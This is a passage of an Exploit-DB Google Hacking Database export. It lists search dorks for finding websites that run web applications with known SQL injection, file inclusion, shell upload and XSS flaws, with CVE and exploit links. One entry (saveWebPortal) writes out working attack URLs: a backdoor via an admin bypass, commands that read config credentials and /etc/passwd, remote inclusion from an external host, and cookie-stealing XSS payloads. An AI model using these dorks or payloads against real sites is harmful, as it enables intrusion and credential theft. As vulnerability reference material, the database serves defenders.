<edb>https://www.exploit-db.com/exploits/8350</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1764</id>
<link>https://www.exploit-db.com/ghdb/1764</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Gravy Media&quot;</shortDescription>
<textualDescription>Gravy Media Photo Host 1.0.8 Local File Disclosure Vulnerability - CVE: 2009-2184: https://www.exploit-db.com/exploits/8996</textualDescription>
<query>&quot;Powered by Gravy Media&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Gravy+Media%22</querystring>
<edb>https://www.exploit-db.com/exploits/8996</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3351</id>
<link>https://www.exploit-db.com/ghdb/3351</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Grayscale Blog&quot;</shortDescription>
<textualDescription>Grayscale Blog 0.8.0 (Security Bypass/SQL/XSS) Multiple Remote Vulns - CVE: 2007-1432: https://www.exploit-db.com/exploits/3447</textualDescription>
<query>&quot;Powered by Grayscale Blog&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Grayscale+Blog%22</querystring>
<edb>https://www.exploit-db.com/exploits/3447</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1124</id>
<link>https://www.exploit-db.com/ghdb/1124</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by GTChat 0.95&quot;+&quot;User Login&quot;+&quot;Remember my login information&quot;</shortDescription>
<textualDescription>There is a (adduser) remote denial of service vulnerabilty on version 0.95</textualDescription>
<query>&quot;Powered by GTChat 0.95&quot;+&quot;User Login&quot;+&quot;Remember my login information&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+GTChat+0.95%22%2B%22User+Login%22%2B%22Remember+my+login+information%22</querystring>
<edb></edb>
<date>2005-09-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>3524</id>
<link>https://www.exploit-db.com/ghdb/3524</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by guestbook script&quot;</shortDescription>
<textualDescription>GuestBook Script 1.7 (include_files) Remote Code Execution: https://www.exploit-db.com/exploits/1575</textualDescription>
<query>&quot;powered by guestbook script&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+guestbook+script%22</querystring>
<edb>https://www.exploit-db.com/exploits/1575</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1317</id>
<link>https://www.exploit-db.com/ghdb/1317</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by guestbook script&quot; -ihackstuff -exploit</shortDescription>
<textualDescription>poc exploit &amp; explaination: http://retrogod.altervista.org/gbs_17_xpl_pl.html</textualDescription>
<query>&quot;powered by guestbook script&quot; -ihackstuff -exploit</query>
<querystring>https://www.google.com/search?num=100&amp;hl=it&amp;q=%22powered+by+guestbook+script%22+-ihackstuff+-exploit&amp;filter=0</querystring>
<edb></edb>
<date>2006-03-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>1208</id>
<link>https://www.exploit-db.com/ghdb/1208</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by GuppY v4&quot;|&quot;Site cr̮̩̮̩ avec GuppY v4&quot;</shortDescription>
<textualDescription>Guppy remote code execution / various arbitrary inclusion issuesadvisory &amp; poc exploit:http://rgod.altervista.org/guppy459_xpl.html</textualDescription>
<query>&quot;powered by GuppY v4&quot;|&quot;Site cr̮̩̮̩ avec GuppY v4&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+GuppY+v4%22%7C%22Site+cr%C3%A9%C3%A9+avec+GuppY+v4%22</querystring>
<edb></edb>
<date>2005-11-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>3169</id>
<link>https://www.exploit-db.com/ghdb/3169</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By HASHE&quot;</shortDescription>
<textualDescription>HASHE! Solutions Multiple SQL Injection Vulnerabilities: https://www.exploit-db.com/exploits/11383</textualDescription>
<query>&quot;Powered By HASHE&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+By+HASHE%22</querystring>
<edb>https://www.exploit-db.com/exploits/11383</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2870</id>
<link>https://www.exploit-db.com/ghdb/2870</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by How2asp&quot;</shortDescription>
<textualDescription>How2ASP.net Webboard 4.1 Remote SQL Injection Vulnerability - CVE: 2008-2417: https://www.exploit-db.com/exploits/5638</textualDescription>
<query>&quot;Powered by How2asp&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+How2asp%22</querystring>
<edb>https://www.exploit-db.com/exploits/5638</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2428</id>
<link>https://www.exploit-db.com/ghdb/2428</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by i-pos Storefront&quot;</shortDescription>
<textualDescription>I-Pos Internet Pay Online Store 1.3 Beta SQL Injection Vulnerability - CVE: 2008-2634: https://www.exploit-db.com/exploits/5717</textualDescription>
<query>&quot;Powered by i-pos Storefront&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+i-pos+Storefront%22</querystring>
<edb>https://www.exploit-db.com/exploits/5717</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>504</id>
<link>https://www.exploit-db.com/ghdb/504</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by IceWarp Software&quot; inurl:mail</shortDescription>
<textualDescription>IceWarp Web Mail is reported prone to multiple input validation vulnerabilities. Few details regarding the specific vulnerabilities are known. These vulnerabilities are reported to affect all versions of IceWarp Web Mail prior to version 5.2.8.There are two ways to find installations of IceWarp:&quot;Powered by IceWarp Software&quot; inurl:mailintitle:&quot;IceWarp Web Mail&quot; inurl:&quot;:32000/mail/&quot;http://www.securityfocus.com/bid/10920</textualDescription>
<query>&quot;Powered by IceWarp Software&quot; inurl:mail</query>
<querystring>https://www.google.com/search?q=%22Powered+by+IceWarp+Software%22+inurl%3Amail</querystring>
<edb></edb>
<date>2004-09-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>461</id>
<link>https://www.exploit-db.com/ghdb/461</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Ikonboard 3.1.1&quot;</shortDescription>
<textualDescription>IkonBoard (http://www.ikonboard.com/) is a comprehensive web bulletin board system, implemented as a Perl/CGI script.There is a flaw in the Perl code that cleans up user input before interpolating it into a string which gets passed to Perl's eval() function, allowing an attacker to evaluate arbitrary Perl and hence run arbitrary commands.More info at: http://www.securitytracker.com/alerts/2003/Apr/1006446.htmlThe bug was fixed in 3.1.2.</textualDescription>
<query>&quot;Powered by Ikonboard 3.1.1&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Ikonboard+3.1.1%22</querystring>
<edb></edb>
<date>2004-09-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>3491</id>
<link>https://www.exploit-db.com/ghdb/3491</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by ILIAS&quot; </shortDescription>
<textualDescription>ILIAS LMS 3.9.9/3.10.7 Arbitrary Edition/Info Disclosure Vulns: https://www.exploit-db.com/exploits/9151</textualDescription>
<query>&quot;powered by ILIAS&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+ILIAS%22</querystring>
<edb>https://www.exploit-db.com/exploits/9151</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1459</id>
<link>https://www.exploit-db.com/ghdb/1459</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by ILIAS&quot;</shortDescription>
<textualDescription>ILIAS 3.7.4 (ref_id) Blind SQL Injection Vulnerability - CVE: 2008-5816: https://www.exploit-db.com/exploits/7570</textualDescription>
<query>&quot;powered by ILIAS&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+ILIAS%22</querystring>
<edb>https://www.exploit-db.com/exploits/7570</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3464</id>
<link>https://www.exploit-db.com/ghdb/3464</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by IMGallery&quot;</shortDescription>
<textualDescription>IMGallery 2.5 Create Uploader Script - CVE: 2007-0082: https://www.exploit-db.com/exploits/3049</textualDescription>
<query>&quot;Powered by IMGallery&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+IMGallery%22</querystring>
<edb>https://www.exploit-db.com/exploits/3049</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1681</id>
<link>https://www.exploit-db.com/ghdb/1681</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by iNetScripts&quot;</shortDescription>
<textualDescription>Powered by iNetScripts: Shell Upload Vulnerability: https://www.exploit-db.com/exploits/12384</textualDescription>
<query>&quot;Powered by iNetScripts&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+iNetScripts%22</querystring>
<edb>https://www.exploit-db.com/exploits/12384</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2432</id>
<link>https://www.exploit-db.com/ghdb/2432</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by INVOhost&quot;</shortDescription>
<textualDescription>INVOhost SQL Injection - CVE: 2010-1336: https://www.exploit-db.com/exploits/11874</textualDescription>
<query>&quot;Powered by INVOhost&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+INVOhost%22</querystring>
<edb>https://www.exploit-db.com/exploits/11874</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1853</id>
<link>https://www.exploit-db.com/ghdb/1853</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By IP.Board 3.0.0 Beta 5&quot;</shortDescription>
<textualDescription>Invision Power Board 3.0.0b5 Active XSS &amp; Path Disclosure Vulns: https://www.exploit-db.com/exploits/8538</textualDescription>
<query>&quot;Powered By IP.Board 3.0.0 Beta 5&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+By+IP.Board+3.0.0+Beta+5%22</querystring>
<edb>https://www.exploit-db.com/exploits/8538</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2915</id>
<link>https://www.exploit-db.com/ghdb/2915</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by iScripts SocialWare&quot;</shortDescription>
<textualDescription>iScripts SocialWare (id) Remote SQL Injection Vulnerbility - CVE: 2008-1772: https://www.exploit-db.com/exploits/5402</textualDescription>
<query>&quot;Powered by iScripts SocialWare&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+iScripts+SocialWare%22</querystring>
<edb>https://www.exploit-db.com/exploits/5402</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2268</id>
<link>https://www.exploit-db.com/ghdb/2268</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by ispCP Omega&quot;</shortDescription>
<textualDescription>ispCP Omega 1.0.4 Remote File Include Vulnerability: https://www.exploit-db.com/exploits/11681</textualDescription>
<query>&quot;Powered by ispCP Omega&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22Powered+by+ispCP+Omega%22</querystring>
<edb>https://www.exploit-db.com/exploits/11681</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1083</id>
<link>https://www.exploit-db.com/ghdb/1083</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by ITWorking&quot;</shortDescription>
<textualDescription>saveWebPortal 3.4 remote code execution / admin check bypass / remote fileinclusion / cross site scripting author site: http://www.circeos.itdownload page: http://www.circeos.it/frontend/index.php?page=downloadsa) remote code execution:a user can bypass admin check, calling this url:http://[target]/saveweb/admin/PhpMyExplorer/editerfichier.php?chemin=.&amp;fichier=header.php&amp;type=Sourcenow can leave a backdoor in header.php or some other file, example:after editing template, user can execute arbitrary system commands, through aurl like this:http://[target]/saveweb/header.php?command=ls%20-lato list directories...http://[target]/saveweb/header.php?command=cat%20config.inc.phpto see database username/password and admin panel username/password (now attacker have full access to site configuration... can go tohttp://[target]/saveweb/admin/to login...)http://[target]/saveweb/header.php?command=cat%20/etc/passwdto see passwd file...b) arbitrary file inclusion:a user can view any file on the target server,if not with .php extension:http://[target]/saveweb/menu_dx.php?SITE_Path=../../../../../boot.ini%00http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=../../../../../boot.ini%00can execute arbitrary file resident on target server, if with .php extension,example :http://[target]/saveweb/menu_dx.php?SITE_Path=../../../../../[script].php%00http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=../../../../../[script].php%00can craft a malicious url to cause victim user to execute commands on externalsite:http://[target]/saveweb/menu_dx.php?SITE_Path=http://[external_site]/cmd.gif%00http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=http://[external_site]/cmd.gif%00where cmd.gif is a file like this:c) xss:c.1)http://[target]/saveweb/footer.php?TABLE_Width=&gt;alert(document.cookie)http://[target]/saveweb/footer.php?SITE_Author_Domain=&gt;alert(document.cookie)http://[target]/saveweb/footer.php?SITE_Author=&gt;alert(document.cookie)http://[target]/saveweb/footer.php?L_Info=&gt;alert(document.cookie)http://[target]/saveweb/footer.php?L_Help=&gt;alert(document.cookie)http://[target]/saveweb/header.php?TABLE_Width=&gt;alert(document.cookie)http://[target]/saveweb/header.php?L_Visitors=&gt;alert(document.cookie)http://[target]/saveweb/header.php?count=&gt;alert(document.cookie)http://[target]/saveweb/header.php?SITE_Logo=&quot;&gt;alert(document.cookie)http://[target]/saveweb/header.php?BANNER_Url=&quot;&gt;alert(document.cookie)http://[target]/saveweb/header.php?L_Sunday=&quot;}alert(document.cookie)</textualDescription>
<query>&quot;powered by ITWorking&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;c2coff=1&amp;q=%22powered+by+ITWorking%22+-site%3Aihackstuff.com+-site%3Asecuritytracker.com+-forum+-hacker</querystring>
<edb></edb>
<date>2005-08-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>3372</id>
<link>https://www.exploit-db.com/ghdb/3372</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by JAMM&quot;</shortDescription>
<textualDescription>JAMM CMS (id) Remote Blind SQL Injection - CVE: 2008-2755: https://www.exploit-db.com/exploits/5789</textualDescription>
<query>&quot;powered by JAMM&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+JAMM%22</querystring>
<edb>https://www.exploit-db.com/exploits/5789</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3488</id>
<link>https://www.exploit-db.com/ghdb/3488</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by jaws&quot; | &quot;powered by the jaws project&quot; | inurl:?gadget=search</shortDescription>
<textualDescription>Jaws 0.6.2 (Search gadget) Remote SQL Injection - CVE: 2006-3292: https://www.exploit-db.com/exploits/1946/</textualDescription>
<query>&quot;powered by jaws&quot; | &quot;powered by the jaws project&quot; | inurl:?gadget=search</query>
<querystring>https://www.google.com/search?q=%22powered+by+jaws%22+|+%22powered+by+the+jaws+project%22+|+inurl:%3Fgadget%3Dsearch</querystring>
<edb>https://www.exploit-db.com/exploits/1946</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3375</id>
<link>https://www.exploit-db.com/ghdb/3375</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by jmdcms.com&quot;</shortDescription>
<textualDescription>JMD-CMS Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/15044</textualDescription>
<query>&quot;powered by jmdcms.com&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+jmdcms.com%22</querystring>
<edb>https://www.exploit-db.com/exploits/15044</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4110</id>
<link>https://www.exploit-db.com/ghdb/4110</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by joomla 3.2&quot; OR &quot;powered by joomla 3.3&quot; OR &quot;powered by joomla 3.4&quot;</shortDescription>
<textualDescription>Search for all websites built on specific versions of Joomla CMS . These
specific versions of Joomla could potentially be vulnerable
to the SQL injection attack (CVE-2015-7297) .
Thanks
Dheeraj
</textualDescription>
<query>&quot;powered by joomla 3.2&quot; OR &quot;powered by joomla 3.3&quot; OR &quot;powered by joomla 3.4&quot;</query>
<querystring>https://www.google.com/search?q=&quot;powered by joomla 3.2&quot; OR &quot;powered by joomla 3.3&quot; OR &quot;powered by joomla 3.4&quot;</querystring>
<edb></edb>
<date>2015-11-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>3024</id>
<link>https://www.exploit-db.com/ghdb/3024</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by jshop&quot;</shortDescription>
<textualDescription>JShop 1.x - 2.x (page.php xPage) Local File Inclusion Vulnerability - CVE: 2008-1624: https://www.exploit-db.com/exploits/5325</textualDescription>
<query>&quot;powered by jshop&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+jshop%22</querystring>
<edb>https://www.exploit-db.com/exploits/5325</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2466</id>
<link>https://www.exploit-db.com/ghdb/2466</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by jSite 1.0 OE&quot;</shortDescription>
<textualDescription>jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities - CVE: 2008-3192: https://www.exploit-db.com/exploits/6057</textualDescription>
<query>&quot;Powered by jSite 1.0 OE&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+jSite+1.0+OE%22</querystring>
<edb>https://www.exploit-db.com/exploits/6057</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3657</id>
<link>https://www.exploit-db.com/ghdb/3657</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by KaiBB 1.0.1&quot;</shortDescription>
<textualDescription>Multiple Vulnerabilities:https://www.exploit-db.com/exploits/15846/</textualDescription>
<query>&quot;Powered by KaiBB 1.0.1&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+KaiBB+1.0.1%22</querystring>
<edb>https://www.exploit-db.com/exploits/15846</edb>
<date>2010-12-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>1596</id>
<link>https://www.exploit-db.com/ghdb/1596</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Knowledge Base&quot;</shortDescription>
<textualDescription>Knowledge Base Mod 2.0.2 (phpBB) Remote Inclusion Vulnerability - CVE: 2006-2134: https://www.exploit-db.com/exploits/1728</textualDescription>
<query>&quot;Powered by Knowledge Base&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Knowledge+Base%22</querystring>
<edb>https://www.exploit-db.com/exploits/1728</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3768</id>
<link>https://www.exploit-db.com/ghdb/3768</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by kryCMS&quot;</shortDescription>
<textualDescription>kryCMS Version 3.0 SQL Injection. Author: tempe_mendoan</textualDescription>
<query>&quot;Powered by kryCMS&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Powered by kryCMS&quot;</querystring>
<edb></edb>
<date>2011-12-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>2062</id>
<link>https://www.exploit-db.com/ghdb/2062</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by kure&quot;</shortDescription>
<textualDescription>Kure 0.6.3 (index.php post,doc) Local File Inclusion Vulnerability - CVE: 2008-4632: https://www.exploit-db.com/exploits/6767</textualDescription>
<query>&quot;powered by kure&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+kure%22</querystring>
<edb>https://www.exploit-db.com/exploits/6767</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>5898</id>
<link>https://www.exploit-db.com/ghdb/5898</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Lanius CMS&quot;</shortDescription>
<textualDescription># Google Dork: &quot;Powered by Lanius CMS&quot;
# By using this dork, sites &quot;Powered by Lanius CMS&quot; can be found. Lanius
CMS various versions are prone to multiple SQL Injection vulnerabilities.
This dork is linked to the following existing exploits:
https://www.exploit-db.com/exploits/30450
https://www.exploit-db.com/exploits/30449
https://www.exploit-db.com/exploits/30448
https://www.exploit-db.com/exploits/5618
https://www.exploit-db.com/exploits/4258
# Date: 07/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>&quot;Powered by Lanius CMS&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Powered by Lanius CMS&quot;</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>1721</id>
<link>https://www.exploit-db.com/ghdb/1721</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by LDU&quot;</shortDescription>
<textualDescription>LDU 8.x (polls.php) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/2871</textualDescription>
<query>&quot;Powered by LDU&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+LDU%22</querystring>
<edb>https://www.exploit-db.com/exploits/2871</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3416</id>
<link>https://www.exploit-db.com/ghdb/3416</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Leap&quot; </shortDescription>
<textualDescription>Leap CMS 0.1.4 (SQL/XSS/SU) Multiple Remote Vulnerabilities - CVE: 2009-1615: https://www.exploit-db.com/exploits/8577</textualDescription>
<query>&quot;Powered by Leap&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Leap%22</querystring>
<edb>https://www.exploit-db.com/exploits/8577</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3557</id>
<link>https://www.exploit-db.com/ghdb/3557</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Leap&quot;</shortDescription>
<textualDescription>Leap CMS 0.1.4 (searchterm) Blind SQL Injection - CVE: 2009-1613:
https://www.exploit-db.com/exploits/8576</textualDescription>
<query>&quot;Powered by Leap&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Leap%22</querystring>
<edb>https://www.exploit-db.com/exploits/8576</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>5872</id>
<link>https://www.exploit-db.com/ghdb/5872</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By Liferay&quot;</shortDescription>
<textualDescription># Google Dork: &quot;Powered By Liferay&quot;
# By using this dork, sites &quot;Powered By Liferay&quot; can be found. Liferay
Portal various versions are prone to multiple cross-site scripting
vulnerabilities. This dork is linked to the following existing exploits:
https://www.exploit-db.com/exploits/39626
https://www.exploit-db.com/exploits/46983
https://www.exploit-db.com/exploits/39880
https://www.exploit-db.com/exploits/31082
# Date: 31/03/2020
# Author: Alexandros Pappas
</textualDescription>
<query>&quot;Powered By Liferay&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Powered By Liferay&quot;</querystring>
<edb></edb>
<date>2020-03-31</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>3415</id>
<link>https://www.exploit-db.com/ghdb/3415</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by LifeType&quot; &quot;RSS 0.90&quot; &quot;RSS 1.0&quot; &quot;RSS 2.0&quot; &quot;Valid XHTML 1.0 Strict and CSS&quot;</shortDescription>
<textualDescription>LifeType 1.0.4 SQL Injection / Admin Credentials Disclosure - CVE: 2006-2857: https://www.exploit-db.com/exploits/1874</textualDescription>
<query>&quot;Powered by LifeType&quot; &quot;RSS 0.90&quot; &quot;RSS 1.0&quot; &quot;RSS 2.0&quot; &quot;Valid XHTML 1.0 Strict and CSS&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+LifeType%22+%22RSS+0.90%22+%22RSS+1.0%22+%22RSS+2.0%22+%22Valid+XHTML+1.0+Strict+and+CSS%22</querystring>
<edb>https://www.exploit-db.com/exploits/1874</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2958</id>
<link>https://www.exploit-db.com/ghdb/2958</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by LightBlog&quot; - Powered by LightBlog</shortDescription>
<textualDescription>LightBlog 9.5 cp_upload_image.php Remote File Upload Vulnerability - CVE: 2008-0632: https://www.exploit-db.com/exploits/5033</textualDescription>
<query>&quot;Powered by LightBlog&quot; - Powered by LightBlog</query>
<querystring>https://www.google.com/search?q=%22Powered+by+LightBlog%22+-+Powered+by+LightBlog</querystring>
<edb>https://www.exploit-db.com/exploits/5033</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3324</id>
<link>https://www.exploit-db.com/ghdb/3324</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by LightNEasy&quot;</shortDescription>
<textualDescription>LightNEasy 3.1.x Multiple Vulnerabilite: https://www.exploit-db.com/exploits/12322</textualDescription>
<query>&quot;Powered by LightNEasy&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+LightNEasy%22</querystring>
<edb>https://www.exploit-db.com/exploits/12322</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2085</id>
<link>https://www.exploit-db.com/ghdb/2085</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by LionWiki &quot;</shortDescription>
<textualDescription>LionWiki 3.X (index.php) Shell Upload Vulnerability: https://www.exploit-db.com/exploits/12075</textualDescription>
<query>&quot;powered by LionWiki &quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+LionWiki+%22</querystring>
<edb>https://www.exploit-db.com/exploits/12075</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2262</id>
<link>https://www.exploit-db.com/ghdb/2262</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Locazolist Copyright © 2006&quot;</shortDescription>
<textualDescription>LocazoList 2.01a beta5 (subcatID) Remote SQL Injection Vulnerability - CVE: 2007-0129: https://www.exploit-db.com/exploits/3073</textualDescription>
<query>&quot;Powered by Locazolist Copyright © 2006&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22Powered+by+Locazolist+Copyright+%C2%A9+2006%22</querystring>
<edb>https://www.exploit-db.com/exploits/3073</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3697</id>
<link>https://www.exploit-db.com/ghdb/3697</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;POWERED BY LOG1 CMS&quot;</shortDescription>
<textualDescription>Multiple Vulnerabilities: https://www.exploit-db.com/exploits/16969/</textualDescription>
<query>&quot;POWERED BY LOG1 CMS&quot;</query>
<querystring>https://www.google.com/search?q=&quot;POWERED BY LOG1 CMS&quot;</querystring>
<edb>https://www.exploit-db.com/exploits/16969</edb>
<date>2011-03-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>1297</id>
<link>https://www.exploit-db.com/ghdb/1297</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Loudblog&quot;</shortDescription>
<textualDescription>this dork is for the LoudBlog</textualDescription>
<query>&quot;Powered by Loudblog&quot;</query>
<querystring>https://www.google.com/search?hl=it&amp;q=%22Powered+by+Loudblog%22+&amp;btnG=Cerca+con+Google</querystring>
<edb></edb>
<date>2006-02-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>3387</id>
<link>https://www.exploit-db.com/ghdb/3387</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by LoudBlog&quot;</shortDescription>
<textualDescription>LoudBlog 0.5 (id) SQL Injection / Admin Credentials Disclosure - CVE: 2006-3832: https://www.exploit-db.com/exploits/2050</textualDescription>
<query>&quot;Powered by LoudBlog&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+LoudBlog%22</querystring>
<edb>https://www.exploit-db.com/exploits/2050</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1656</id>
<link>https://www.exploit-db.com/ghdb/1656</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Maian Recipe v1.0&quot;</shortDescription>
<textualDescription>Maian Recipe 1.0 (path_to_folder) Remote File Include Vulnerability - CVE: 2007-0848: https://www.exploit-db.com/exploits/3284</textualDescription>
<query>&quot;Powered by Maian Recipe v1.0&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Maian+Recipe+v1.0%22</querystring>
<edb>https://www.exploit-db.com/exploits/3284</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3070</id>
<link>https://www.exploit-db.com/ghdb/3070</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by mcGalleryPRO&quot;</shortDescription>
<textualDescription>mcGalleryPRO 2006 (path_to_folder) Remote Include Vulnerability - CVE: 2006-4720: https://www.exploit-db.com/exploits/2342</textualDescription>
<query>&quot;powered by mcGalleryPRO&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+mcGalleryPRO%22</querystring>
<edb>https://www.exploit-db.com/exploits/2342</edb>
<date>2010-11-15</date>
<author>anonymous</author>
